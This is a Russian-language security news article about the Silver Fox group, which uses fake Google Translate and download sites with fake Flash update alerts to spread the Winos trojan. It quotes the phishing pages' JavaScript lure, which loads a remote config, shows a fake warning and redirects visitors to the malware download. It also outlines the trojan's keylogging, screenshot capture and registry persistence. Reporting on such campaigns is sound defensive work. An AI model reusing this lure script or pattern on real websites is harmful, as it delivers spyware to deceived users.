Группировка Silver Fox нашла новый способ заражать компьютеры под Windows: она создаёт точные копии популярных онлайн-инструментов — в первую очередь Google Переводчика — и раздаёт через них троян Winos. Кампанию обнаружили исследователи из Knownsec 404 Team; по их данным, группировка активна с 2024 года и постоянно меняет тактику социальной инженерии.
Как устроена ловушка
Атакующие поднимают фальшивые сайты, копирующие интерфейс Google Переводчика, конвертеров валют и страниц загрузки популярных программ — например, WPS Office. Как только пользователь взаимодействует с такой страницей, ему показывают поддельное уведомление об устаревшей версии Flash Player, которое ведёт на сервер злоумышленников с вредоносным установочным пакетом.
Технически всё реализовано аккуратно: на фишинговых сайтах внедрён JavaScript-код, который создаёт скрытые поля ввода и подтягивает конфигурацию из удалённого JSON-файла, прежде чем показать фальшивое окно обновления. Вот фрагмент такого скрипта:
fetch('url.json')
.then(response => response.json())
.then(data => {
const urlToUse = data[0];
document.body.addEventListener('click', function() {
alert("检测Flash版本过低,请安装后插件重试!");
});
window.location.href = urlToUse;
});
Текст всплывающего окна на китайском языке переводится как «Обнаружена устаревшая версия Flash, установите плагин и повторите попытку», что указывает на ориентацию кампании (как минимум частично) на китаеязычную аудиторию.
Что делает вредонос после установки
После запуска установщика на систему разворачивается набор компонентов, включая файлы javaw.exe и Microsoftdata.exe — названия подобраны так, чтобы имитировать легитимное ПО Microsoft. Сам троян Winos обладает полноценным набором функций для кражи данных: делает скриншоты, ведёт кейлоггинг и отслеживает содержимое буфера обмена.
Закрепление в системе достигается через модификацию реестра — вредонос прописывает себя в автозагрузку Windows, обеспечивая себе устойчивость после перезагрузок.
При анализе финальной полезной нагрузки исследователи обнаружили в базе данных программы упоминание «RexRat4.0.3». Это говорит о том, что злоумышленники используют коммерчески доступный инструмент удалённого доступа, переработанный под нужды киберпреступной кампании.
Почему это тревожно
Кампания Silver Fox — ещё одно подтверждение тенденции, о которой всё чаще предупреждают специалисты: злоумышленники всё реже эксплуатируют технические уязвимости, делая ставку на социальную инженерию и доверие пользователей к знакомым сервисам. Именно поэтому обучение сотрудников и внимательность при загрузке «обновлений плагинов» с непроверенных сайтов остаются одной из главных линий защиты — техническими средствами такие атаки перехватываются далеко не всегда.
Источник: Cybersecurity News.